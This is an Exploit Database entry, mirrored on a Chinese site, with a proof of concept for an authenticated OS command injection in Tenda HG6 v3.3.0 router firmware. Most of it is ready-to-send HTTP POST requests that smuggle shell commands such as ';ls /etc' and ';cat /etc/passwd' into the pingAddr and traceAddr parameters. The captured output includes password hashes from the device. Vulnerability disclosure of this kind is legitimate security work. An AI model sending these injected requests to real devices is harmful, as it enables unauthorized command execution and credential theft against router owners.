Tenda HG6 v3.3.0 – Remote Command Injection

• Exploit Database
• 114 阅读

• 作者： LiquidWorm
  日期： 2022-05-11
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50916/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147

  # Exploit Title: Tenda HG6 v3.3.0 - Remote Command Injection # Exploit Author: LiquidWorm   Tenda HG6 v3.3.0 Remote Command Injection Vulnerability     Vendor: Tenda Technology Co.,Ltd. Product web page: https://www.tendacn.com https://www.tendacn.com/product/HG6.html Affected version: Firmware version: 3.3.0-210926 Software version: v1.1.0 Hardware Version: v1.0 Check Version: TD_HG6_XPON_TDE_ISP   Summary: HG6 is an intelligent routing passive optical network terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1*GE,3*FE), a voice port to meet users' requirements for enjoying the Internet, HD IPTV and VoIP multi-service applications.   Desc: The application suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters in formPing, formPing6, formTracert and formTracert6 interfaces.   Tested on: Boa/0.93.15     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience     Advisory ID: ZSL-2022-5706 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5706.php     22.04.2022   --     ping.asp: ---------   POST /boaform/formPing HTTP/1.1 Host: 192.168.1.1   pingAddr=;ls /etc&wanif=65535&submit-url=/ping.asp&postSecurityFlag=2564   --- TZ app.gwdt bftpd.conf buildtime check_version.txt config config.csv config_default.xml config_default_hs.xml dhclient-script dnsmasq.conf ethertypes factory_default.xml ftpdpassword group hardversion inetd.conf init.d inittab innversion insdrv.sh irf mdev.conf omci_custom_opt.conf omci_ignore_mib_tbl.conf omci_ignore_mib_tbl_10g.conf omci_mib.cfg orf passwd ppp profile protocols radvd.conf ramfs.img rc_boot_dsp rc_voip release_date resolv.conf rtk_tr142.sh run_customized_sdk.sh runoam.sh runomci.sh runsdk.sh samba scripts services setprmt_reject shells simplecfgservice.xml smb.conf softversion solar.conf solar.conf.in ssl_cert.pem ssl_key.pem version wscd.conf     ping6.asp: ----------   POST /boaform/formPing6 HTTP/1.1 Host: 192.168.1.1   pingAddr=;ls&wanif=65535&go=Go&submit-url=/ping6.asp   --- boa.conf web     tracert.asp: ------------   POST /boaform/formTracert HTTP/1.1 Host: 192.168.1.1   traceAddr=;pwd&trys=1&timeout=5&datasize=38&dscp=0&maxhop=10&go=Go&submit-url=/tracert.asp   --- /home/httpd     tracert6.asp: -------------   POST /boaform/formTracert6 HTTP/1.1 Host: 192.168.1.1   traceAddr=;cat /etc/passwd&trys=1&timeout=5&datasize=38&maxhop=10&go=Go&submit-url=/tracert6.asp   --- admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/sh adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/sh nobody:x:0:0::/tmp:/dev/null user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/sh